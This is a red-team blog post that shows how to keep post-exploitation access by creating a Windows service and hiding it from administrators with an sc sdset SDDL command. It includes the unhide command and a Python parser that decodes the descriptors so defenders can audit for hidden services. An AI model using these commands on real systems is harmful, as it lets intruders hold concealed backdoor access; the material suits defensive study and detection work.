
Red Team Technique: Hiding a Windows Service

2020-10-16 / 0 comments / Penetration testing / Mrxn


In post-exploitation, once we have obtained access to the target machine, we need a way to keep that access and make it persistent. Yes, persistence matters, in life as much as at work!

Using a Windows service to plant a backdoor is a common technique, but a service planted the usual way is easily spotted by an administrator in Task Manager. If the service can be hidden, our persistence improves considerably. This post introduces a technique that uses PowerShell to hide a Windows service; the hidden service still starts normally after a reboot.

First, create a service (from a cmd prompt running with administrator privileges; note that sc requires a space after each = sign):

sc create mrxn binPath= C:/Users/olil.cn/Desktop/mrxn.exe start= auto
[Screenshot: sc_create.png]

As the screenshot above shows, a Windows service named mrxn was created successfully. In a real engagement you could add a description, pick a misleading name, and so on to confuse the other side.

Then open a PowerShell window with administrator privileges and run the following Security Descriptor Definition Language (SDDL) command to hide the mrxn service we created:

& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
[Screenshot: hide.png]

Once the command succeeds, the mrxn service we created no longer appears in Task Manager (you need to restart Task Manager or refresh it from the command line).

If you no longer want this Windows service hidden, run the following SDDL command to unhide it:

& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
[Screenshot: unhide.png]

As the screenshot above shows, the Windows service is unhidden successfully.
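To see exactly what the hide and unhide commands above change, it helps to decode the SDDL strings rather than treat them as magic. The following is an added example written for this post, not code from the original author or from the SANS article it cites. It parses a service SDDL string into its DACL and SACL entries, names the two-letter right codes as they apply to service objects, and reports which trustees lose SERVICE_QUERY_STATUS (LC). The hide string prepends deny entries for interactive users (IU), service logon users (SU) and Builtin Administrators (BA) that strip DC, LC, WP, DT and SD, so those callers can no longer query the service's status and service listings omit it; the unhide string drops the deny entries and restores the default allow entries. The access-check model here is a simplification (an explicit deny for the named trustee always wins, and group membership is not modelled); the two SDDL constants are the ones from this page.

```python
import re

# Meaning of the two-letter right codes for service objects: the nine
# service-specific rights plus the four standard rights used in the page's SDDL.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG",
    "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START",
    "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE",
    "RC": "READ_CONTROL",
    "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
}

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}

TRUSTEES = {
    "IU": "Interactive users",
    "SU": "Service logon users",
    "BA": "Builtin Administrators",
    "SY": "Local System",
    "WD": "Everyone",
}

ACE_RE = re.compile(r"\(([^)]*)\)")
ACL_RE = re.compile(r"(D|S):((?:\([^)]*\))*)")  # DACL ("D:") and SACL ("S:") sections


def split_rights(rights):
    """Split a rights string such as 'DCLCWPDTSD' into its two-letter codes."""
    if len(rights) % 2:
        raise ValueError(f"odd-length rights string: {rights!r}")
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def parse_ace(text):
    """Parse one ACE body 'type;flags;rights;object_guid;inherit_guid;trustee'."""
    parts = text.split(";")
    if len(parts) != 6:
        raise ValueError(f"malformed ACE: ({text})")
    ace_type, flags, rights, _obj, _inh, trustee = parts
    return {
        "type": ACE_TYPES.get(ace_type, ace_type),
        "flags": flags,
        "rights": split_rights(rights),
        "trustee": trustee,
    }


def parse_sddl(sddl):
    """Return {'dacl': [...], 'sacl': [...]} for a service SDDL string."""
    acls = {"dacl": [], "sacl": []}
    for m in ACL_RE.finditer(sddl):
        key = "dacl" if m.group(1) == "D" else "sacl"
        acls[key] = [parse_ace(a) for a in ACE_RE.findall(m.group(2))]
    return acls


def effective_rights(sddl, trustee):
    """Allowed rights minus denied rights for one trustee abbreviation.

    Simplification: a real access check walks the DACL in order and considers
    every group the caller belongs to; here an explicit deny for the trustee wins.
    """
    allowed, denied = set(), set()
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["trustee"] != trustee:
            continue
        if ace["type"] == "ACCESS_ALLOWED":
            allowed |= ace["rights"]
        elif ace["type"] == "ACCESS_DENIED":
            denied |= ace["rights"]
    return allowed - denied


def is_hidden_from(sddl, trustee):
    """Without SERVICE_QUERY_STATUS (LC) the caller's service listing omits the service."""
    return "LC" not in effective_rights(sddl, trustee)


def denied_rights(sddl, trustee):
    """Human-readable names of the rights explicitly denied to a trustee, sorted."""
    names = set()
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["type"] == "ACCESS_DENIED" and ace["trustee"] == trustee:
            names |= {SERVICE_RIGHTS.get(r, r) for r in ace["rights"]}
    return sorted(names)


# The two SDDL strings from the post (hide, then unhide).
HIDE_SDDL = ("D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

UNHIDE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    for label, sddl in (("hide", HIDE_SDDL), ("unhide", UNHIDE_SDDL)):
        print(f"== {label} ==")
        for t in ("BA", "IU", "SU", "SY"):
            print(f"{TRUSTEES[t]:>22}: hidden={is_hidden_from(sddl, t)} "
                  f"denied={denied_rights(sddl, t)}")
```

From the defender's side, the same parser audits real systems: dump a service's descriptor with `sc sdshow <name>` and pass the string to `is_hidden_from(sddl, "BA")`; any service whose DACL denies LC to BA is one that administrators' service listings will not show, which is exactly the condition the blue-team post linked below looks for.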

This method is still of some use to red teams; experienced pentesters are welcome to try it out and comment.

The detailed explanation comes from here: http://www.sans.org/blog/red-team-tactics-hiding-windows-services/ ; I am only putting it into practice.

Finding hidden Windows services:

Blue Team Technique: Finding Hidden Windows Services

Tags: attack, penetration testing
